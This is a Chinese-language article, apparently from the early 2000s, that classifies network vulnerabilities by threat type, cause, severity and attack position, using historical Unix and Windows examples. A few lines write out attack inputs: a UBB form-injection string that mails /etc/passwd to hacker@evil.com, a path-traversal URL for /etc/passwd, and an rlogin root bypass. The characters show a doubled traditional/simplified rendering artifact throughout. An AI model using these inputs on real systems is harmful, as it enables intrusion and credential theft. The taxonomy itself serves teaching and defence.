計(jì)算機(jī)網(wǎng)絡(luò)系統(tǒng)安全漏洞分類(lèi)研究
寫(xiě)本文的目地是為了總結(jié)一些東西,解決在試圖構(gòu)造一個(gè)漏洞數(shù)據(jù)庫(kù)的過(guò)程中碰到的主要問(wèn)題,也就是如何對(duì)計(jì)算機(jī)網(wǎng)絡(luò)漏洞進(jìn)行分類(lèi)的問(wèn)題。文中的一些想法并不成熟,有些甚至連自己也不滿意,權(quán)作拋磚引玉,以期與在這方面有深入研究的同仁交流,共同提高完善。
一個(gè)計(jì)算機(jī)網(wǎng)絡(luò)安全漏洞有它多方面的屬性,我認(rèn)為主要可以用以下幾個(gè)方面來(lái)概括:漏洞可能造成的直接威脅,漏洞的成因,漏洞的嚴(yán)重性,漏洞被利用的方式。以下的討論將回繞這幾個(gè)方面對(duì)漏洞細(xì)分其類(lèi)。
A.按漏洞可能對(duì)系統(tǒng)造成的直接威脅
可以大致分成以下幾類(lèi),事實(shí)上一個(gè)系統(tǒng)漏洞對(duì)安全造成的威脅遠(yuǎn)不限于它的直接可能性,如果攻擊者獲得了對(duì)系統(tǒng)的一般用戶訪問(wèn)權(quán)限,他就極有可能再通過(guò)利用本地漏洞把自己升級(jí)為管理員權(quán)限:
一.遠(yuǎn)程管理員權(quán)限
攻擊者無(wú)須一個(gè)賬號(hào)登錄到本地直接獲得遠(yuǎn)程系統(tǒng)的管理員權(quán)限,通常通過(guò)攻擊以root身份執(zhí)行的有缺陷的系統(tǒng)守護(hù)進(jìn)程來(lái)完成。漏洞的絕大部分來(lái)源于緩沖區(qū)溢出,少部分來(lái)自守護(hù)進(jìn)程本身的邏輯缺陷。
典型漏洞:
IMAP4rev1 v10.190版的守護(hù)進(jìn)程imapd的AUTHENTICATE命令存在讀入?yún)?shù)時(shí)未做長(zhǎng)度檢查,構(gòu)造一個(gè)精心設(shè)計(jì)的AUTH命令串,可以溢出imapd的緩沖區(qū),執(zhí)行指定的命令,由于imapd以root身份運(yùn)行,從而直接獲得機(jī)器的root權(quán)限。
WindowsNT IIS 4.0的ISAPI DLL對(duì)輸入的URL未做適當(dāng)?shù)倪吔鐧z查,如果構(gòu)造一個(gè)超長(zhǎng)的URL,可以溢出IIS (inetinfo.exe)的緩沖區(qū),執(zhí)行我們指定的代碼。由于inetinfo.exe是以local system身份啟動(dòng),溢出后可以直接得到管理員權(quán)限。
早期AIX 3.2 rlogind代碼存在認(rèn)證邏輯缺陷,用rlogin victim.com -l -froot,可以直接以root身份登錄到系統(tǒng)而無(wú)須提供口令。
二.本地管理員權(quán)限
攻擊者在已有一個(gè)本地賬號(hào)能夠登錄到系統(tǒng)的情況下,通過(guò)攻擊本地某些有缺陷的suid程序,競(jìng)爭(zhēng)條件等手段,得到系統(tǒng)的管理員權(quán)限。
典型漏洞:
RedHat Linux的restore是個(gè)suid程序,它的執(zhí)行依靠一個(gè)中RSH的環(huán)境變量,通過(guò)設(shè)置環(huán)境變量PATH,可以使RSH變量中的可執(zhí)行程序以root身份運(yùn)行,從而獲得系統(tǒng)的root權(quán)限。
Solaris 7的Xsun程序有suid位,它對(duì)輸入?yún)?shù)未做有效的邊界檢查,可以很容易地溢出它的緩沖區(qū),以root身份運(yùn)行我們指定的代碼,從而獲得管理員權(quán)限。
在windows2000下,攻擊者就有機(jī)會(huì)讓網(wǎng)絡(luò)DDE(一種在不同的Windows機(jī)器上的應(yīng)用程序之間動(dòng)態(tài)共享數(shù)據(jù)的技術(shù))代理在本地系統(tǒng)用戶的安全上下文中執(zhí)行其指定的代碼,從而提升權(quán)限并完全控制本地機(jī)器。
三.普通用戶訪問(wèn)權(quán)限
攻擊者利用服務(wù)器的漏洞,取得系統(tǒng)的普通用戶存取權(quán)限,對(duì)UNIX類(lèi)系統(tǒng)通常是shell訪問(wèn)權(quán)限,對(duì)Windows系統(tǒng)通常是cmd.exe的訪問(wèn)權(quán)限,能夠以一般用戶的身份執(zhí)行程序,存取文件。攻擊者通常攻擊以非root身份運(yùn)行的守護(hù)進(jìn)程,有缺陷的cgi程序等手段獲得這種訪問(wèn)權(quán)限。
典型漏洞:
UBB是個(gè)廣泛運(yùn)行于各種UNIX和Windows系統(tǒng)的論壇程序,用PERL實(shí)現(xiàn),它的5.19以下版本存在輸入驗(yàn)證問(wèn)題,通過(guò)提交精心構(gòu)造的表單內(nèi)容,可以使UBB去執(zhí)行shell命令,因?yàn)橐话愕膚eb服務(wù)器以nobody身份運(yùn)行,因此可以得到一個(gè)nobody shell。比如提交這樣的數(shù)據(jù):topic='012345.ubb|mail hacker@evil.com </etc/passwd|',我們就可以得到系統(tǒng)的passwd文件。
RedHat Linux 6.2帶的innd 2.2.2.3版新聞服務(wù)器,存在緩沖區(qū)溢出漏洞,通過(guò)一個(gè)精心構(gòu)造的新聞信件可以使innd服務(wù)器以news身份運(yùn)行我們指定的代碼,得到一個(gè)innd權(quán)限的shell。
Windows IIS 4.0-5.0存在Unicode解碼漏洞,可以使攻擊者利用cmd.exe以guest組的權(quán)限在系統(tǒng)上運(yùn)行程序。相當(dāng)于取得了普通用戶的權(quán)限。
四.權(quán)限提升
攻擊者在本地通過(guò)攻擊某些有缺陷的sgid程序,把自己的權(quán)限提升到某個(gè)非root用戶的水平。獲得管理員權(quán)限可以看做是一種特殊的權(quán)限提升,只是因?yàn)橥{的大小不同而把它獨(dú)立出來(lái)。
典型漏洞:
RedHat Linux 6.1帶的man程序?yàn)閟gid man,它存在format bug,通過(guò)對(duì)它的溢出攻擊,可以使攻擊者得到man組的用戶權(quán)限。
Solaris 7的write程序?yàn)閟gid tty,它存在緩沖區(qū)溢出問(wèn)題,通過(guò)對(duì)它的攻擊可以攻擊者得到tty組的用戶權(quán)限。
WindowsNT系統(tǒng)中,攻擊者能夠使系統(tǒng)中其他用戶裝入一個(gè)”特洛化”的porfile,使其他用戶執(zhí)行攻擊者的惡意代碼,有時(shí)甚至是管理員。
五.讀取受限文件
攻擊者通過(guò)利用某些漏洞,讀取系統(tǒng)中他應(yīng)該沒(méi)有權(quán)限的文件,這些文件通常是安全相關(guān)的。這些漏洞的存在可能是文件設(shè)置權(quán)限不正確,或者是特權(quán)進(jìn)程對(duì)文件的不正確處理和意外dump core使受限文件的一部份dump到了core文件中。
典型漏洞:
SunOS 5.5的ftpd存在漏洞,一般用戶可以引起ftpd出錯(cuò)而dump出一個(gè)全局可讀的core文件,里面有shadow文件的片斷,從而使一般用戶能讀到shadow的部分內(nèi)容。
SuSE 6.2的suid程序pg,對(duì)它的配置文件處理存在問(wèn)題,當(dāng)把pb.conf鏈接到特權(quán)文件,可以用pb讀取那些文件的內(nèi)容。
Oracle 8.0.3 Enterprise Edition for NT 4.0的日志文件全局可讀而且為明文,它記錄了連接的口令,很可能被攻擊者讀到。
六.遠(yuǎn)程拒絕服務(wù)
攻擊者利用這類(lèi)漏洞,無(wú)須登錄即可對(duì)系統(tǒng)發(fā)起拒絕服務(wù)攻擊,使系統(tǒng)或相關(guān)的應(yīng)用程序崩潰或失去響應(yīng)能力。這類(lèi)漏洞通常是系統(tǒng)本身或其守護(hù)進(jìn)程有缺陷或設(shè)置不正確造成的。
早期的Linux 和 BSD的tcp/ip堆棧的ip 片斷重組模塊存在缺陷,攻擊通過(guò)向系統(tǒng)發(fā)出特殊的ip片斷包可以使機(jī)器崩潰。
Windows2000帶的Netmeeting 3.01存在缺陷,通過(guò)向它發(fā)送二進(jìn)制數(shù)據(jù)流,可以使服務(wù)器的CPU占用達(dá)到100%。
通過(guò)發(fā)送一個(gè)帶有超長(zhǎng)參數(shù)的USER命令給AnalogX Proxy Server 4.04的ftp端口,可以使這個(gè)應(yīng)用程序崩潰。
七.本地拒絕服務(wù)
在攻擊者登錄到系統(tǒng)后,利用這類(lèi)漏洞,可以使系統(tǒng)本身或應(yīng)用程序崩潰。這種漏洞主要因?yàn)槭浅绦驅(qū)σ馔馇闆r的處理失誤,如寫(xiě)臨時(shí)文件之前不檢查文件是否存在,盲目跟隨鏈接等。
BSDi 3.x存在漏洞可以使一個(gè)本地用戶用一些垃圾覆蓋系統(tǒng)上的任何,這樣會(huì)很容易地把系統(tǒng)搞成不可用。
RedHat 6.1的tmpwatch程序存在缺陷,可以使系統(tǒng)fork()出許多進(jìn)程,從而使系統(tǒng)失去響應(yīng)能力。
八.遠(yuǎn)程非授權(quán)文件存取
利用這類(lèi)漏洞,攻擊可以不經(jīng)授權(quán)地從遠(yuǎn)程存取系統(tǒng)的某些文件。這類(lèi)漏洞主要是由一些有缺陷的cgi程序引起的,它們對(duì)用戶輸入沒(méi)有做適當(dāng)?shù)暮戏ㄐ詸z查,使攻擊者通過(guò)構(gòu)造特別的輸入獲得對(duì)文件存取。
典型漏洞:
Poll_It_SSI_v2.0.cgi存在漏洞可以使攻擊者看到web目錄外的所有有權(quán)限看的文件,發(fā)送如下的請(qǐng)求給服務(wù)器就能看到/etc/passwd文件,http://www.targethost.com/pollit/Poll_It_v2.0.cgi?data_dir=\etc\passwd%00
Windows IIS 5.0存在一個(gè)漏洞,通過(guò)向它發(fā)送一個(gè)特殊的head標(biāo)記,可以得到asp源碼,而不是經(jīng)過(guò)解釋執(zhí)行后asp頁(yè)面。
Windows IE存在諸多漏洞允許惡意的web頁(yè)面讀取瀏覽用戶的本地的文件。
九.口令恢復(fù)
因?yàn)椴捎昧撕苋醯目诹罴用芊绞?,使攻擊者可以很容易的分析出口令的加密方法,從而使攻擊者通過(guò)某種方法得到密碼后還原出明文來(lái)。
典型漏洞:
Windows下的PassWD v1.2用來(lái)管理系統(tǒng)中的各種口令,并和URL一起儲(chǔ)存起來(lái)。但它加密儲(chǔ)存的口令加密方式非常脆弱,經(jīng)過(guò)簡(jiǎn)單的分析,就可以從加密后的口令還原出明文。
Pcanywhere 9.0采用非常脆弱的加密方法來(lái)加密傳輸中的口令,只要竅聽(tīng)了傳輸中的數(shù)據(jù)很容易解碼出明文口令。
Browsegate是一個(gè)Windows下的代理防火墻,它的2.80.2版本,在配置文件中儲(chǔ)存了加密后的口令而且配置文件對(duì)所有用戶是可讀的,然而加密方式極其脆弱,可以很容易地解碼出明文。
十.欺騙
利用這類(lèi)漏洞,攻擊者可以對(duì)目標(biāo)系統(tǒng)實(shí)施某種形式的欺騙。這通常是由于系統(tǒng)的實(shí)現(xiàn)上存在某些缺陷。
典型漏洞
Windows IE曾經(jīng)存在一個(gè)漏洞允許一個(gè)惡意網(wǎng)絡(luò)在另一個(gè)風(fēng)站的窗口內(nèi)插入內(nèi)容,從而欺騙用戶輸入敏感數(shù)據(jù)。
Linux kernel 2.0.35以下的tcp/ip堆棧存在漏洞,可以使攻擊者進(jìn)行ip地址欺騙非常容易實(shí)現(xiàn)。
十一.服務(wù)器信息泄露
利用這類(lèi)漏洞,攻擊者可以收集到對(duì)于進(jìn)一步攻擊系統(tǒng)有用的信息。這類(lèi)漏洞的產(chǎn)生主要是因?yàn)橄到y(tǒng)程序有缺陷,一般是對(duì)錯(cuò)誤的不正確處理。
典型漏洞:
Windows IIS 3.0-5.0存在漏洞,當(dāng)向系統(tǒng)請(qǐng)求不存在的.idq,.idq文件時(shí),機(jī)器可能會(huì)返回出錯(cuò)信息,里面暴露了IIS的安裝目錄信息,比如請(qǐng)求http://www.microsoft.com/anything.ida,服務(wù)器會(huì)返回Response: The IDQ file d:\http\anything.ida could not be found。這些對(duì)攻擊者進(jìn)行攻擊可能帶來(lái)方便,比如廣泛流行的msadc的攻擊,需要知道系統(tǒng)的安裝目錄。
Linux kernel 2.1.53以下的tcp/ip堆棧開(kāi)放和關(guān)閉的端口對(duì)特定的數(shù)據(jù)包有特定的回應(yīng),攻擊者可以利用這個(gè)特性進(jìn)行端口的秘密掃描。
某些cgi程序如DBMan (db.cgi)存在漏洞可以使攻擊者看到一些系統(tǒng)的環(huán)境變量,使攻擊者獲得關(guān)于系統(tǒng)一些有用的信息。
十二.其它
雖然以上的幾種分類(lèi)包括了絕大多數(shù)的漏洞情況,可還是有可能存在一些上面幾種類(lèi)型無(wú)法描述的的漏洞,把它們歸到這里。
B.按漏洞的成因
對(duì)其分類(lèi),是對(duì)漏洞進(jìn)行分類(lèi)最另人頭疼的一個(gè)方面,因?yàn)閷?duì)漏洞研究的不同抽象層次,會(huì)對(duì)同一個(gè)漏洞做出不同的分類(lèi),對(duì)下面提到的ps競(jìng)爭(zhēng)條件漏洞,從最低層次上來(lái)說(shuō)是參數(shù)驗(yàn)證錯(cuò)誤,因?yàn)橄嗬^的系統(tǒng)調(diào)用并沒(méi)有檢查他們所處理的是否為同一個(gè)對(duì)象,從高一些的層次看,這是一個(gè)同步或競(jìng)爭(zhēng)條件錯(cuò)誤,從更高的層次看,這則是一個(gè)邏輯錯(cuò)誤,因?yàn)閷?duì)象可能在使用過(guò)程中被刪除。至今也沒(méi)看到一個(gè)比較完美分類(lèi)方案,包括securityfocus上的分類(lèi)也不能讓人滿意,現(xiàn)大致分成以下幾類(lèi):
輸入驗(yàn)證錯(cuò)誤
大多數(shù)的緩沖區(qū)溢出漏洞和cgi類(lèi)漏洞都是由于未對(duì)用戶提供的輸入數(shù)據(jù)的合法性作適當(dāng)?shù)臋z查。
訪問(wèn)驗(yàn)證錯(cuò)誤
漏洞的產(chǎn)生是由于程序的訪問(wèn)驗(yàn)證部分存在某些可利用的邏輯錯(cuò)誤,使繞過(guò)這種訪問(wèn)控制成為可能。上面提到的那個(gè)早期AIX的rlogin漏洞就是這種典型。
競(jìng)爭(zhēng)條件
漏洞的產(chǎn)生在于程序處理文件等實(shí)體時(shí)在時(shí)序和同步方面存在問(wèn)題,這處理的過(guò)程中可能存在一個(gè)機(jī)會(huì)窗口使攻擊者能夠施以外來(lái)的影響。早期的Solaris系統(tǒng)的ps命令存在這種類(lèi)型的漏洞,ps在執(zhí)行的時(shí)候會(huì)在/tmp產(chǎn)生一個(gè)基于它pid的臨時(shí)文件,然后把它c(diǎn)hown為root,改名為ps_data。如果在ps運(yùn)行時(shí)能夠創(chuàng)建這個(gè)臨時(shí)文件指向我們有興趣的文件,這樣ps執(zhí)行以后,我們就可以對(duì)這個(gè)root擁有文件做任意的修改,這可以幫助我們獲得root權(quán)限。
意外情況處置錯(cuò)誤
漏洞的產(chǎn)生在于程序在它的實(shí)現(xiàn)邏輯中沒(méi)有考慮到一些意外情況,而這些意外情況是應(yīng)該被考慮到的。大多數(shù)的/tmp目錄中的盲目跟隨符號(hào)鏈接覆蓋文件的漏洞屬于這種類(lèi)型。例子:Sco UNIX openserver的/etc/sysadm.d/bin/userOsa存在盲目覆蓋調(diào)試日志文件的問(wèn)題,而文件的名字是固定的,通過(guò)把文件名指向某些特權(quán)文件,可以完全破壞系統(tǒng)。
設(shè)計(jì)錯(cuò)誤
這個(gè)類(lèi)別是非?;\統(tǒng)的,嚴(yán)格來(lái)說(shuō),大多數(shù)的漏洞的存在都是設(shè)計(jì)錯(cuò)誤,因此所有暫時(shí)無(wú)法放入到其他類(lèi)別的漏洞,先放在這。
配置錯(cuò)誤
漏洞的產(chǎn)生在于系統(tǒng)和應(yīng)用的配置有誤,或是軟件安裝在錯(cuò)誤的地方,或是錯(cuò)誤的配置參數(shù),或是錯(cuò)誤的訪問(wèn)權(quán)限,策略錯(cuò)誤。
環(huán)境錯(cuò)誤
由一些環(huán)境變量的錯(cuò)誤或惡意設(shè)置造成的漏洞。如攻擊者可能通過(guò)重置shell的內(nèi)部分界符IFS,shell的轉(zhuǎn)義字符,或其它環(huán)境變量,導(dǎo)致有問(wèn)題的特權(quán)程序去執(zhí)行攻擊者指定的程序。上面提到的RedHat Linux的dump程序漏洞就是這種類(lèi)型。
在漏洞的威脅類(lèi)型和產(chǎn)生漏洞的錯(cuò)誤類(lèi)型之間存在一定的聯(lián)系,有直接聯(lián)系的威脅類(lèi)型與錯(cuò)誤類(lèi)型用直線相連,可以看到如下的圖示:
遠(yuǎn)程管理員權(quán)限
輸入驗(yàn)證錯(cuò)誤
本地管理員權(quán)限
訪問(wèn)驗(yàn)證錯(cuò)誤
普通用戶訪問(wèn)權(quán)限
競(jìng)爭(zhēng)條件
權(quán)限提升 意外情況處置錯(cuò)誤
讀取受限文件
遠(yuǎn)程拒絕服務(wù) 設(shè)計(jì)錯(cuò)誤
本地拒絕服務(wù)
遠(yuǎn)程非授權(quán)文件存取
配置錯(cuò)誤
口令恢復(fù)
欺騙 環(huán)境錯(cuò)誤
服務(wù)器信息泄露
可以看到輸入驗(yàn)證錯(cuò)誤幾乎與所有的漏洞威脅有關(guān),設(shè)計(jì)錯(cuò)誤與錯(cuò)誤的配置也會(huì)導(dǎo)致很多威脅。
C.對(duì)漏洞嚴(yán)重性的分級(jí)
一般來(lái)說(shuō)漏洞的威脅類(lèi)型基本上決定了它的嚴(yán)重性,我們可以把嚴(yán)重性分成高,中,低三個(gè)級(jí)別。遠(yuǎn)程和本地管理員權(quán)限大致對(duì)應(yīng)為高,普通用戶權(quán)限,權(quán)限提升,讀取受限文件,遠(yuǎn)程和本地拒絕服務(wù)大致對(duì)應(yīng)中級(jí),遠(yuǎn)程非授權(quán)文件存取,口令恢復(fù),欺騙,服務(wù)器信息泄露大致對(duì)應(yīng)低級(jí)別。但這只是最一般的情況,很多時(shí)候需要具體情況具體分析,如一個(gè)涉及到針對(duì)流行系統(tǒng)本身的遠(yuǎn)程拒絕服務(wù)漏洞,就應(yīng)該是高級(jí)別。同樣一個(gè)被廣泛使用的軟件如果存在弱口令問(wèn)題,有口令恢復(fù)漏洞,也應(yīng)該歸為中高級(jí)別。
D.對(duì)漏洞被利用方式的分類(lèi)
漏洞的存在是個(gè)客觀事實(shí),但漏洞只能以一定的方式被利用,每個(gè)漏洞都要求攻擊處于網(wǎng)絡(luò)空間一個(gè)特定的位置,可能的攻擊方式分為以下四類(lèi):
物理接觸
攻擊者需要能夠物理地接觸目標(biāo)系統(tǒng)才能利用這類(lèi)漏洞,對(duì)系統(tǒng)的安全構(gòu)成威脅。圖示:
攻擊者 主機(jī)
主機(jī)模式
通常的漏洞利用方式。攻擊方為客戶機(jī),被攻擊方為目標(biāo)主機(jī)。比如攻擊者發(fā)現(xiàn)目標(biāo)主機(jī)的某個(gè)守護(hù)進(jìn)程存在一個(gè)遠(yuǎn)程溢出漏洞,攻擊者可能因此取得主機(jī)的額外訪問(wèn)權(quán)。
圖示:
攻擊 攻擊機(jī)器 主機(jī)
客戶機(jī)模式
當(dāng)一個(gè)用戶訪問(wèn)網(wǎng)絡(luò)上的一個(gè)主機(jī),他就可能遭到主機(jī)發(fā)送給自己惡意命令的襲擊??蛻魴C(jī)不應(yīng)該過(guò)度信任主機(jī)。如web瀏覽器IE存在不少漏洞,可以使一些惡意的網(wǎng)站用html標(biāo)記通過(guò)那些漏洞在瀏覽的客戶機(jī)中執(zhí)行程序或讀寫(xiě)文件。
圖示:
攻擊
客戶機(jī) 主機(jī)
中間人方式
當(dāng)攻擊者位于一個(gè)可以觀察或截獲兩個(gè)機(jī)器之間的通信的位置時(shí),就可以認(rèn)為攻擊者處于中間人方式。因?yàn)楹芏鄷r(shí)候主機(jī)之間以明文方式傳輸有價(jià)值的信息,因此攻擊者可以很容易地攻入其他機(jī)器。對(duì)于某些公鑰加密的實(shí)現(xiàn),攻擊者可以截獲并取代密鑰偽裝成網(wǎng)絡(luò)上的兩個(gè)節(jié)點(diǎn)來(lái)繞過(guò)這種限制。
圖示:
通信
主機(jī) 主機(jī)
竅聽(tīng)或篡改
攻擊者
本文對(duì)網(wǎng)絡(luò)安全漏洞作了粗淺地分類(lèi),這遠(yuǎn)不是一個(gè)完美的方案,有興趣的歡迎來(lái)信交流心得。
一些我讀過(guò)的參考資料: http://www.securityfocus.com/external/http://seclab.cs.ucdavis.edu/projects/vulnerabilities/scriv/index.html http://www.securityfocus.com/external/http://seclab.cs.ucdavis.edu/projects/vulnerabilities/scriv/index.html http://www.securityfocus.com/external/http://seclab.cs.ucdavis.edu/projects/vulnerabilities/scriv/index.html
http://www.securityfocus.com/data/library/compvuln_draft.pdf
當(dāng)然還有:
http://www.xfocus.org/html/query_exploit.html
你能在那找到文中所舉的所有漏洞例子
- 2004年十大網(wǎng)絡(luò)安全漏洞
- PHPShop存在多個(gè)安全漏洞
- 逐一偵破 網(wǎng)上銀行安全漏洞
- VBScript開(kāi)發(fā)自動(dòng)化測(cè)試腳本的方法分析
- android monkey自動(dòng)化測(cè)試改為java調(diào)用monkeyrunner Api
- Android 自動(dòng)化測(cè)試經(jīng)驗(yàn)分享 UiObejct.getFromParent()的使用方法
- Python自動(dòng)化測(cè)試工具Splinter簡(jiǎn)介和使用實(shí)例
- python自動(dòng)化測(cè)試實(shí)例解析
- 實(shí)現(xiàn)android應(yīng)用程序自動(dòng)化測(cè)試的批處理腳本
- JavaScript 常見(jiàn)安全漏洞和自動(dòng)化檢測(cè)技術(shù)
相關(guān)文章
加快Windows 2000訪問(wèn)網(wǎng)上鄰居的速度
加快Windows 2000訪問(wèn)網(wǎng)上鄰居的速度...2006-11-11給IE加個(gè)參數(shù) 永遠(yuǎn)不怕IE主頁(yè)被修改
眾所周知,修改IE默認(rèn)主頁(yè)地址是惡意網(wǎng)頁(yè)常用的一招。IE被修改后,會(huì)自動(dòng)連接到惡意網(wǎng)頁(yè)的地址。大家常用的方法是修改注冊(cè)表,其實(shí),只要簡(jiǎn)單給IE加個(gè)參數(shù),就再也不怕IE主頁(yè)地址被修改了。下面是具體的步驟。2008-04-04